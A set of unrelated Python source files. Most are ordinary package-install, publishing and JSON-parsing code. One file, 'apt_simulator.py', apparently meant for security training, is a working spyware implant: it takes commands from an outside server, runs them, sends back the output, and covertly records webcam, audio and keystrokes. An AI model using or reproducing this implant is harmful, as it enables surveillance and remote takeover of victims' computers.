(rc, map) = iuprocess.run_program_and_scan_results([DPKG_QUERY_PATH, "-s", package],
{"status_ok": "^" + re.escape("Status: install ok installed")},
logger, log_output=True)
if rc==0 and map['status_ok']:
return True
else:
return False
@make_value_action
def is_pkg_installed(self, package):
"""Value action to see whether the specified apt package is installed"""
return is_installed(package)
@make_action
def check_installed(self, package):
"""verify that a aptget package is installed
"""
if not is_installed(package):
raise UserError(errors[ERR_PKG_NOT_INSTALLED],
msg_args={"pkg":package, "id":self.ctx.props.id})
@make_action
def ensure_installed(self, package):
"""An action that checks if a single apt package is installed. If not, it
performs the install
"""
if not is_installed(package):
apt_get_install([package], self.ctx._get_sudo_password(self))
else:
self.ctx.logger.debug("Skipping install of package %s - already installed" %
package)
_config_type = {
"input_ports": {
"host": {
"sudo_password" : unicode
}
},
"output_ports": {
"apt_cfg": {
"package_name": unicode
}
}
}
class Config(resource_metadata.Config):
def __init__(self, props_in, types, id, package_name):
resource_metadata.Config.__init__(self, props_in, types)
class Manager(resource_manager.Manager, PasswordRepoMixin):
REQUIRES_ROOT_ACCESS = True
def __init__(self, metadata):
package_name = "%s %s" % (metadata.key["name"],
metadata.key["version"])
resource_manager.Manager.__init__(self, metadata, package_name)
self.config = metadata.get_config(_config_type, Config,
self.id, package_name)
def validate_pre_install(self):
if not os.path.exists(APT_GET_PATH):
raise UserError(errors[ERR_APT_GET_NOT_FOUND],
msg_args={"path":APT_GET_PATH})
def is_installed(self):
return is_installed(self.config.output_ports.apt_cfg.package_name)
def install(self, package):
if isinstance(package, engage_utils.pkgmgr.Package):
local_repository = self.install_context.engage_file_layout.get_cache_directory()
package_path = package.download([], local_repository, dry_run=self.ctx.dry_run)
dpkg_install(package_path, self._get_sudo_password())
else:
apt_get_install([self.config.output_ports.apt_cfg.package_name],
self._get_sudo_password())
self.validate_post_install()
def validate_post_install(self):
if not self.is_installed():
raise UserError(errors[ERR_INSTALL_PKG_QUERY],
msg_args={"pkg":self.config.output_ports.apt_cfg.package_name})
| {
"repo_name": "quaddra/engage",
"path": "python_pkg/engage/drivers/genforma/aptget.py",
"copies": "1",
"size": "10863",
"license": "apache-2.0",
"hash": 7262312938786875000,
"line_mean": 38.9375,
"line_max": 118,
"alpha_frac": 0.6109730277,
"autogenerated": false,
"ratio": 3.753628196268141,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.486460122396814,
"avg_score": null,
"num_lines": null
} |
# aptinstall.py
#: i need to have apt installed
########################## DEPRECATE BECAUSE installing apt is not as complete
########################## as using fabric despite 3.0 issues
import apt
import sys
import requests
def simple_apt_install(pkg_name):
"""
"""
cache = apt.cache.Cache()
cache.update()
pkg = cache[pkg_name]
if pkg.is_installed:
print "{pkg_name} already installed".format(pkg_name=pkg_name)
else:
pkg.mark_install()
try:
cache.commit()
except Exception, arg:
print >> sys.stderr, "Sorry, package installation failed [{err}]".format(err=str(arg))
def download_file(url):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter
r = requests.get(url, stream=True)
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
#f.flush() commented by recommendation from J.F.Sebastian
return local_filename
def download_and_dpkg():
url = 'https://github.com/atom/atom/releases/download/v1.12.5/atom-amd64.deb'
pkg = download_file(url)
dp = apt.debfile.DebPackage(filename=pkg)
dp.install()
def install_base():
"""
"""
pkgs = ["fabric", "emacs"]
for pkg_name in pkgs:
simple_apt_install(pkg_name)
def main():
install_base()
# download_and_dpkg()
if __name__ == '__main__':
main()
| {
"repo_name": "mikadosoftware/weaver",
"path": "weaver/fabmodules/atominstall.py",
"copies": "1",
"size": "1500",
"license": "mit",
"hash": -8995738462746306000,
"line_mean": 24.4237288136,
"line_max": 91,
"alpha_frac": 0.5986666667,
"autogenerated": false,
"ratio": 3.4965034965034967,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9549123102429662,
"avg_score": 0.009209412154766847,
"num_lines": 59
} |
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, string
import os.path
import unique
import UI
import export; reload(export)
import time
import shutil
import traceback
def filepath(filename):
fn = unique.filepath(filename)
return fn
def osfilepath(filename):
fn = filepath(filename)
fn = string.replace(fn,'\\','/')
return fn
def cleanUpLine(line):
line = string.replace(line,'\n','')
line = string.replace(line,'\c','')
data = string.replace(line,'\r','')
data = string.replace(data,'"','')
return data
def annotateMetaProbesetGenes(summary_exp_file, expression_file, metaprobeset_file, species):
metaprobeset_cv_file = string.replace(metaprobeset_file,species+'_',species+'_Conversion_')
metaprobeset_cv_file = string.replace(metaprobeset_cv_file,'.mps','.txt')
fn=filepath(metaprobeset_cv_file); uid_db={}
for line in open(fn,'rU').xreadlines():
data = UI.cleanUpLine(line)
uid,ens_gene = string.split(data,'\t')
uid_db[uid] = ens_gene
export_data = export.ExportFile(expression_file)
fn=filepath(summary_exp_file); x=0
for line in open(fn,'rU').xreadlines():
if line[0] == '#': null=[]
elif x == 0: export_data.write(line); x+=1
else:
data = cleanUpLine(line)
t = string.split(data,'\t')
uid = t[0]; ens_gene = uid_db[uid]
export_data.write(string.join([ens_gene]+t[1:],'\t')+'\n')
export_data.close()
def reformatResidualFile(residual_exp_file,residual_destination_file):
### Re-write the residuals file so it has a single combined unique ID (arbitrary gene ID + probe ID)
print 'Re-formatting and moving the calculated residuals file...'
export_data = export.ExportFile(residual_destination_file)
fn=filepath(residual_exp_file); x=0
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
if x==0 and data[0]=='#': null=[]
elif x == 0:
x+=1; t = string.split(data,'\t')
export_data.write(string.join(['UID']+t[5:],'\t')+'\n')
else:
t = string.split(data,'\t')
uid = t[0]+'-'+t[2] ### arbitrary numeric gene ID + probes ID
export_data.write(string.join([uid]+t[5:],'\t')+'\n')
export_data.close()
os.remove(residual_exp_file)
def verifyFileLength(filename):
count = 0
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines():
count+=1
if count>9: break
except Exception: null=[]
return count
def APTDebugger(output_dir):
fatal_error = ''
fn = filepath(output_dir+'/apt-probeset-summarize.log')
for line in open(fn,'rU').xreadlines():
if 'FATAL ERROR:' in line:
fatal_error = line
return fatal_error
def probesetSummarize(exp_file_location_db,analyze_metaprobesets,probeset_type,species,root):
for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
fl = exp_file_location_db[dataset]
apt_dir =fl.APTLocation()
array_type=fl.ArrayType()
pgf_file=fl.InputCDFFile()
clf_file=fl.CLFFile()
bgp_file=fl.BGPFile()
xhyb_remove = fl.XHybRemoval()
cel_dir=fl.CELFileDir() + '/cel_files.txt'
expression_file = fl.ExpFile()
stats_file = fl.StatsFile()
output_dir = fl.OutputDir() + '/APT-output'
cache_dir = output_dir + '/apt-probeset-summarize-cache'
architecture = fl.Architecture() ### May over-ride the real architecture if a failure occurs
get_probe_level_results = 'yes'
if get_probe_level_results == 'yes': export_features = 'yes'
if xhyb_remove == 'yes' and (array_type == 'gene' or array_type == 'junction'): xhyb_remove = 'no' ### This is set when the user mistakenly selects exon array, initially
if analyze_metaprobesets == 'yes':
export_features = 'true'
metaprobeset_file = filepath('AltDatabase/'+species+'/'+array_type+'/'+species+'_'+array_type+'_'+probeset_type+'.mps')
count = verifyFileLength(metaprobeset_file)
if count<2:
import ExonArray
ExonArray.exportMetaProbesets(array_type,species) ### Export metaprobesets for this build
import subprocess; import platform
print 'Processor architecture set =',architecture,platform.machine()
if '/bin' in apt_dir: apt_file = apt_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
elif os.name == 'nt':
if '32bit' in architecture: apt_file = apt_dir + '/PC/32bit/apt-probeset-summarize'; plat = 'Windows'
elif '64bit' in architecture: apt_file = apt_dir + '/PC/64bit/apt-probeset-summarize'; plat = 'Windows'
elif 'darwin' in sys.platform: apt_file = apt_dir + '/Mac/apt-probeset-summarize'; plat = 'MacOSX'
elif 'linux' in sys.platform:
if '32bit' in platform.architecture(): apt_file = apt_dir + '/Linux/32bit/apt-probeset-summarize'; plat = 'linux32bit'
elif '64bit' in platform.architecture(): apt_file = apt_dir + '/Linux/64bit/apt-probeset-summarize'; plat = 'linux64bit'
apt_file = filepath(apt_file)
apt_extract_file = string.replace(apt_file,'probeset-summarize','cel-extract')
#print 'AltAnalyze has choosen APT for',plat
print "Beginning probeset summarization of input CEL files with Affymetrix Power Tools (APT)..."
if 'cdf' in pgf_file or 'CDF' in pgf_file:
if xhyb_remove == 'yes' and array_type == 'AltMouse':
kill_list_dir = osfilepath('AltDatabase/'+species+'/AltMouse/'+species+'_probes_to_remove.txt')
else: kill_list_dir = osfilepath('AltDatabase/affymetrix/APT/probes_to_remove.txt')
try:
### Below code attempts to calculate probe-level summarys and absent/present p-values
### for 3'arrays (may fail for arrays with missing missmatch probes - AltMouse)
cdf_file = pgf_file; algorithm = 'rma'
retcode = subprocess.call([
apt_file, "-d", cdf_file, "--kill-list", kill_list_dir, "-a", algorithm, "-o", output_dir,
"--cel-files", cel_dir, "-a", "pm-mm,mas5-detect.calls=1.pairs=1"])
try:
extract_retcode = subprocess.call([
apt_extract_file, "-d", cdf_file, "--pm-with-mm-only", "-o", output_dir+'/probe.summary.txt',
"--cel-files", cel_dir, "-a"]) ### "quant-norm,pm-gcbg", "--report-background" -requires a BGP file
except Exception,e:
#print traceback.format_exc()
retcode = False ### On some system there is a no file found error, even when the analysis completes correctly
if retcode: status = 'failed'
else:
status = 'run'
summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
#shutil.copyfile(summary_exp_file, expression_file)
os.remove(summary_exp_file)
summary_stats_file = output_dir+'/pm-mm.mas5-detect.summary.txt'
try: shutil.copyfile(summary_stats_file, stats_file)
except Exception: None ### Occurs if dabg export failed
os.remove(summary_stats_file)
except Exception:
#print traceback.format_exc()
try:
cdf_file = pgf_file; algorithm = 'rma'; pval = 'dabg'
retcode = subprocess.call([
apt_file, "-d", cdf_file, "--kill-list", kill_list_dir, "-a", algorithm, "-o", output_dir, "--cel-files", cel_dir]) # "-a", pval,
if retcode: status = 'failed'
else:
status = 'run'
summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
#shutil.copyfile(summary_exp_file, expression_file)
os.remove(summary_exp_file)
except NameError:
status = 'failed'
#print traceback.format_exc()
else:
if xhyb_remove == 'yes':
kill_list_dir = osfilepath('AltDatabase/'+species+'/exon/'+species+'_probes_to_remove.txt')
else: kill_list_dir = osfilepath('AltDatabase/affymetrix/APT/probes_to_remove.txt')
if 'Glue' in pgf_file:
kill_list_dir = string.replace(pgf_file,'pgf','kil') ### Needed to run DABG without crashing
#psr_dir = string.replace(pgf_file,'pgf','PSR.ps') ### used with -s
try:
algorithm = 'rma-sketch'; pval = 'dabg'
if analyze_metaprobesets != 'yes':
retcode = subprocess.call([
apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir,
"-a", algorithm, "-a", pval, "-o", output_dir, "--cel-files", cel_dir]) # "--chip-type", "hjay", "--chip-type", "HJAY" http://www.openbioinformatics.org/penncnv/penncnv_tutorial_affy_gw6.html
if retcode:
summary_exp_file = output_dir+'/'+pval+'.summary.txt'
try: os.remove(summary_exp_file)
except Exception: null=[] ### Occurs if dabg export failed
fatal_error = APTDebugger(output_dir)
if len(fatal_error)>0:
print fatal_error
print 'Skipping DABG p-value calculation to resolve (Bad library files -> contact Affymetrix support)'
retcode = subprocess.call([
apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir,
"-a", algorithm, "-o", output_dir, "--cel-files", cel_dir]) ### Exclude DABG p-value - known issue for Glue junction array
else: bad_exit
else:
retcode = subprocess.call([
apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir, "-m", metaprobeset_file,
"-a", algorithm, "-a", pval, "-o", output_dir, "--cel-files", cel_dir, "--feat-details", export_features])
if retcode:
summary_exp_file = output_dir+'/'+pval+'.summary.txt'
try: os.remove(summary_exp_file)
except Exception: null=[] ### Occurs if dabg export failed
fatal_error = APTDebugger(output_dir)
if len(fatal_error)>0:
print fatal_error
print 'Skipping DABG p-value calculation to resolve (Bad library files -> contact Affymetrix support)'
retcode = subprocess.call([
apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir, "-m", metaprobeset_file,
"-a", algorithm, "-o", output_dir, "--cel-files", cel_dir, "--feat-details", export_features]) ### Exclude DABG p-value - known issue for Glue junction array
else: bad_exit
if retcode: status = 'failed'
else:
status = 'run'
summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
#if analyze_metaprobesets == 'yes': annotateMetaProbesetGenes(summary_exp_file, expression_file, metaprobeset_file, species)
export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
#shutil.copyfile(summary_exp_file, expression_file)
os.remove(summary_exp_file)
summary_exp_file = output_dir+'/'+pval+'.summary.txt'
#if analyze_metaprobesets == 'yes': annotateMetaProbesetGenes(summary_exp_file, stats_file, metaprobeset_file, species)
try:
shutil.copyfile(summary_exp_file, stats_file)
os.remove(summary_exp_file)
except Exception:
print traceback.format_exc()
null=[] ### Occurs if dabg export failed
if analyze_metaprobesets == 'yes':
residual_destination_file = string.replace(expression_file,'exp.','residuals.')
residual_exp_file = output_dir+'/'+algorithm+'.residuals.txt'
#shutil.copyfile(residual_exp_file, residual_destination_file);os.remove(residual_exp_file)
reformatResidualFile(residual_exp_file,residual_destination_file)
residual_dabg_file = output_dir+'/dabg.residuals.txt'; os.remove(residual_dabg_file)
except NameError:
status = 'failed'
#print traceback.format_exc()
cache_delete_status = export.deleteFolder(cache_dir)
if status == 'failed':
if architecture == '64bit' and platform.architecture()[0] == '64bit' and (os.name == 'nt' or 'linux' in sys.platform):
print 'Warning! 64bit version of APT encountered an error, trying 32bit.'
### If the above doesn't work, try 32bit architecture instead of 64bit (assuming the problem is related to known transient 64bit build issues)
for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
fl = exp_file_location_db[dataset]; fl.setArchitecture('32bit')
probesetSummarize(exp_file_location_db,analyze_metaprobesets,probeset_type,species,root)
else:
print_out = 'apt-probeset-summarize failed. See log and report file in the output folder under "ExpressionInput/APT-output" for more details.'
try:
WarningWindow(print_out,'Exit')
root.destroy()
except Exception:
print print_out; force_exit
else:
print 'CEL files successfully processed. See log and report file in the output folder under "ExpressionInput/APT-output" for more details.'
| {
"repo_name": "wuxue/altanalyze",
"path": "APT.py",
"copies": "2",
"size": "15855",
"license": "apache-2.0",
"hash": 1052014943234627300,
"line_mean": 56.4456521739,
"line_max": 211,
"alpha_frac": 0.5763481552,
"autogenerated": false,
"ratio": 3.9322916666666665,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5508639821866667,
"avg_score": null,
"num_lines": null
} |
from VideoCapture import Device
import pyaudio
import wave
import subprocess
import pythoncom, pyHook
import sys
import re
import os
import time
import urllib2
import logging
reload(sys)
sys.setdefaultencoding('iso-8859-9')
opener = urllib2.build_opener(urllib2.HTTPHandler)
urllib2.install_opener(opener)
console = 1
def cls():
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
os.system("clear")
elif sys.platform == 'win32':
os.system("cls")
else:
os.system("cls")
def take_screenshot():
if console:
print "* Taking screenshot..."
cam = Device()
cam.saveSnapshot('apt.jpg')
if console:
print "* done\n"
def record_audio():
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 5
WAVE_OUTPUT_FILENAME = "apt.wav"
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
if console:
print "* Recording audio..."
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
if console:
print "* done\n"
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
def keylogger():
if console:
print "* Logging key events... (press enter to escape)"
def OnKeyboardEvent (event):
keys = ""
full_path = os.path.realpath(__file__)
path, file = os.path.split(full_path)
path = path + "\keylogs.txt"
keyfile = open(path, "a")
key = chr(event.Ascii)
if event.Ascii == 13:
key = "\n"
hook.UnhookKeyboard()
if console:
print "* done\n"
main()
keys = keys + key
keyfile.write(keys)
keyfile.close()
hook = pyHook.HookManager()
hook.KeyDown = OnKeyboardEvent
hook.HookKeyboard()
pythoncom.PumpMessages()
def process_order(cmd):
if console:
print "* Running received command:", cmd
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
result = p.communicate()[0]
if console:
print "* Command output:", result
# print "* done."
url = "http://www.mertsarica.com/apt_simulator/apt.php?cmd=" + result
if console:
print "* Sending command output (%s) to APT Simulator..." % (result.strip())
response = opener.open(url)
if console:
print "* done\n"
def take_order():
url = "http://www.mertsarica.com/apt_simulator/apt.php"
print "* Connecting to APT Simulator:", url
response = opener.open(url)
html = response.read()
re1='((?:[a-z][a-z0-9_]*))' # Variable Name 1
re2='(:)' # Any Single Character 1
re3='((?:[a-z][a-z0-9_]*))' # Variable Name 2
re4='(:)' # Any Single Character 2
re5='((?:[a-z][a-z0-9_]*))' # Variable Name 3
re6='(:)' # Any Single Character 3
re7='((?:[a-z][a-z0-9_]*))' # Variable Name 4
rg = re.compile(re1+re2+re3+re4+re5+re6+re7,re.IGNORECASE|re.DOTALL)
m = rg.search(html)
if m:
var1=m.group(1)
c1=m.group(2)
var2=m.group(3)
c2=m.group(4)
var3=m.group(5)
c3=m.group(6)
var4=m.group(7)
if console:
print "* Received command:", var1+c1+var2+c2+var3+c3+var4+"\n"
if var1 == "ses":
record_audio()
if var2 == "ekrangoruntusu":
take_screenshot()
if var4:
process_order(var4)
if var3 == "tuskaydi":
keylogger()
def main():
while (1==1):
try:
take_order()
except SystemExit:
import msvcrt
while msvcrt.kbhit():
msvcrt.getch()
print "* Bye..."
sys.exit(1)
except KeyboardInterrupt:
import msvcrt
while msvcrt.kbhit():
msvcrt.getch()
print "* Bye..."
sys.exit(1)
except:
if console:
print "---\nError, sleeping mode!(", str(sys.exc_info()), ")"
time.sleep(300)
main()
if __name__ == '__main__':
cls()
if console:
print "========================================="
print "APT Simulator [http://www.mertsarica.com]"
print "========================================="
main()
| {
"repo_name": "mertsarica/hack4career",
"path": "codes/apt_simulator.py",
"copies": "1",
"size": "4363",
"license": "apache-2.0",
"hash": 6215487543844510000,
"line_mean": 21.3315508021,
"line_max": 78,
"alpha_frac": 0.5933990374,
"autogenerated": false,
"ratio": 2.842345276872964,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8624758151084473,
"avg_score": 0.062197232637698156,
"num_lines": 187
} |
"""A publisher that just writes output to a file.
By itself, this is mainly used for testing, but it's also the basis for
classes like PodcastPublisher.
"""
import os
from nose.tools import set_trace
from botfriend.bot import Publisher
from botfriend.model import _now
class FileOutputPublisher(Publisher):
def __init__(
self, bot, full_config, module_config
):
filename = module_config['filename']
if not filename.startswith(os.path.sep):
filename = os.path.join(bot.directory, filename)
self.path = filename
dir, ignore = os.path.split(self.path)
if not os.path.exists(dir):
os.makedirs(dir)
def self_test(self):
dir, ignore = os.path.split(self.path)
if not os.path.exists(dir):
raise IOError("Destination directory %s does not exist." % dir)
def publish(self, post, publication):
publish_at = post.publish_at or _now()
content = publication.content or post.content or "[no textual content]"
output = publish_at.strftime("%Y-%m-%d %H:%M:%S")
parts = [content]
for attach in post.attachments:
if attach.content:
parts.append(
"%s-byte %s" % (len(attach.content or ""), attach.media_type)
)
else:
parts.append(
"Local %s: %s " % (attach.media_type, attach.filename)
)
output = output + " | " + (" | ".join(parts)) + "\n"
with open(self.path, 'a') as out:
out.write(output)
publication.report_success()
Publisher = FileOutputPublisher
| {
"repo_name": "leonardr/botfriend",
"path": "botfriend/publish/file.py",
"copies": "1",
"size": "1685",
"license": "mit",
"hash": 4272797181592147000,
"line_mean": 34.1041666667,
"line_max": 81,
"alpha_frac": 0.5768545994,
"autogenerated": false,
"ratio": 4.002375296912114,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0053707312387310776,
"num_lines": 48
} |
"""A Publisher that publishes to a web application using HTTP"""
import time
import requests
from alarmageddon.publishing.publisher import Publisher
from alarmageddon.publishing.exceptions import PublishFailure
class HttpPublisher(Publisher):
"""Creates an HTTP Publisher that publishes successes and/or failures
to either one or two HTTP end points.
If you want the same URL to be published to whether or not the the
Validation result being published failed or succeeded, please
supply only the url parameter and omit the failure_url and
success_url parameters.
Conversely, if you want different URLs to be requested based on
whether or not the Validation result being published succeeded,
please omit the url parameter and supply the success_url and
failure_url parameters. The HttpPublisher will use the same
method, headers, and authentication parameters when requesting
both of those URLs. If that is not acceptable, please override
the relevent getter methods.
:param url: The URL that this publisher should publish successful and
failed Validation results to.
:param success_url: The URL that this publisher should publish successful
Validation results to.
:param failure_url: The URL that this publisher should publish failed
Validation results to.
:param method: The HTTP method to use when posting. POST is the default
because it is the only HTTP method that allows you to send the results
of the published Validation. The GET method is allowed but cannot send
the details of the Validation result along with the request.
:param headers: headers to send along with the request
:param auth: if your URLs require authentication you can supply a value
like the following: ``auth=('user', 'pass')``
:param attempts: the number of times to try to publish to your URL(s).
:param retry_after_seconds: how many seconds to wait after a failed
attempt.
:param timeout_seconds: how long a single attempt can take before it is
considered a failed attempt.
:param publish_successes: specify True if you want this HTTP Publisher to
publish successful results too. If you provide a success_url, then
this HttpPublisher will assume you want to publish successes.
:param expected_status_code: the HTTP status code to expect from your
HTTP server if the Validation result was successfully published.
:param name: The name of this publisher.
:param priority_threshold: Will publish validations of this priority or
higher.
"""
def __init__(self, url=None, success_url=None, failure_url=None,
method="POST", headers=None, auth=None, attempts=1,
retry_after_seconds=2, timeout_seconds=5,
publish_successes=False, expected_status_code=200,
name=None, priority_threshold=None):
super(HttpPublisher, self).__init__(
name or "HttpPublisher",
priority_threshold)
self._success_url = success_url or url
if not self._success_url:
raise ValueError("either success_url or url parameter is required")
self._failure_url = failure_url or url
if not self._failure_url:
raise ValueError("either failure_url or url parameter is required")
self._publish_successes = (success_url is not None) or publish_successes
self._method = method
if not self._method:
raise ValueError("method parameter is requried")
self._headers = headers
self._auth = auth
self._attempts = attempts
if self._attempts <= 0:
raise ValueError("attempts parameter must be at least one")
self._retry_after_seconds = retry_after_seconds
if self._retry_after_seconds < 0:
raise ValueError("retry_after_seconds parameter must be positive")
self._timeout_seconds = timeout_seconds
self._expected_status_code = expected_status_code
def _get_method(self, result):
"""Returns the HTTP method (e.g. GET, POST, etc.) that the
HttpPublisher should use when publishing.
"""
return self._method
def _get_url(self, result):
"""Returns the URL that the HttpPublisher should publish to."""
if result.is_failure():
return self._failure_url
else:
return self._success_url
def _get_headers(self, result):
"""return the headers, as a dict, that this HttpPublisher should
include when it publishes.
"""
return self._headers
def _get_auth(self, result):
"""Returns None or Authentication information (e.g. ``auth=('user',
'pass')``) that this HttpPublisher should send along with the
request.
"""
return self._auth
def _get_data(self, result):
"""Returns the data that this HttpPublisher should send along with the
request.
It is only relevant when the HTTP Method is ``POST``.
"""
if self._method == "POST":
return str(result)
else:
return None
def send(self, result):
"""Publish a test result.
:param result: The :py:class:`~.result.TestResult` of a test.
"""
if result.is_failure() or self._publish_successes:
published = False
for i in xrange(self._attempts):
try:
response = requests.request(self._get_method(result),
self._get_url(result),
data=self._get_data(result),
headers=self._get_headers(result),
auth=self._get_auth(result),
timeout=self._timeout_seconds)
if response.status_code == self._expected_status_code:
published = True
break
except Exception:
time.sleep(self._retry_after_seconds)
if not published:
raise PublishFailure(self, result)
def __str__(self):
"""Returns a string representation of this HttpPublisher"""
return "HttpPublisher: '{0}', Method: {1}, Success URL: {2}," +\
"Failure URL: {3}".format(self._name, self._method,
self._success_url, self._failure_url)
| {
"repo_name": "curtisallen/Alarmageddon",
"path": "alarmageddon/publishing/http.py",
"copies": "1",
"size": "6608",
"license": "apache-2.0",
"hash": 8385952268562180000,
"line_mean": 39.7901234568,
"line_max": 82,
"alpha_frac": 0.6230326877,
"autogenerated": false,
"ratio": 4.798838053740014,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00024135650701463698,
"num_lines": 162
} |
"""A pull parser for parsing JSON streams"""
# The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import decimal
import re
import json
import logging
from . import util # @UnusedImport # noqa
if sys.version_info[0] == 2:
from StringIO import StringIO # @UnresolvedImport #@UnusedImport
else:
from io import StringIO # @UnresolvedImport @UnusedImport @Reimport # noqa
logger = logging.getLogger(__name__)
# JSONNode and value types.
OBJECT = "OBJECT"
ARRAY = "ARRAY"
FIELD = "FIELD"
STRING = "STRING"
NUMBER = "NUMBER"
BOOLEAN = "BOOLEAN"
NULL = "null"
TRUE = "true"
FALSE = "false"
# JSONEvent types.
START_OBJECT = "START_OBJECT"
START_ARRAY = "START_ARRAY"
FIELD_NAME = "FIELD_NAME"
FIELD_VALUE = "FIELD_VALUE"
ARRAY_VALUE = "ARRAY_VALUE"
END_OBJECT = "END_OBJECT"
END_ARRAY = "END_ARRAY"
# JSONParseError codes
JSON_SYNTAX_ERROR = "JSON_SYNTAX_ERROR"
JSON_INCOMPLETE_ERROR = "JSON_INCOMPLETE_ERROR"
JSON_UNEXPECTED_ELEMENT_ERROR = "JSON_UNEXPECTED_ELEMENT_ERROR"
class JSONPullParser (object):
def __init__(self, stream, encoding="utf8", size=2 ** 16):
"""Initialize pull parser with a JSON stream."""
self.stream = stream
self.size = size
self.encoding = encoding
self.node = None
self.value = ""
self.valueType = None
self.tokens = []
self.tokenIndex = 0
self.halfToken = ""
self.pattern = re.compile('([\[\]{}:\\\\",])')
def expectObject(self):
"""Raise JSONParseError if next event is not the start of an object."""
event = self.nextEvent()
if event.type != START_OBJECT:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_OBJECT but got: " + str(event))
def expectArray(self):
"""Raise JSONParseError if next event is not the start of an array."""
event = self.nextEvent()
if event.type != START_ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_ARRAY but got: " + str(event))
return JSONArrayIterator(self)
def expectField(self, expectedName, expectedType=None, allowNull=False,
readAll=False):
"""Raise JSONParseError if next event is not the expected field with
expected type else return the field value. If the next field is
an OBJECT or ARRAY, only return whole object or array if
readAll=True."""
event = self.nextEvent()
if event.type != FIELD_NAME:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected FIELD_NAME but got: " + str(event))
if event.value != expectedName:
raise JSONParseError(JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
expectedName + " field but got " +
event.value + " instead.")
return self._expectValue(FIELD_VALUE, expectedType, allowNull, readAll)
def expectArrayValue(self, expectedType=None, allowNull=False,
readAll=False):
"""Raise JSONParseError if next event is not an array element with
the expected type else return the field value. If the next value
is an OBJECT or ARRAY, only return whole object or array if
readAll=True."""
return self._expectValue(ARRAY_VALUE, expectedType, allowNull, readAll)
def _expectValue(self, eventType, expectedType, allowNull, readAll):
event = self.nextEvent()
if event.type == eventType:
if allowNull and event.valueType == NULL:
return None
elif expectedType is not None and event.valueType != expectedType:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " + expectedType +
" but got " + event.valueType + " instead.")
else:
return event.value
else:
if eventType == ARRAY_VALUE:
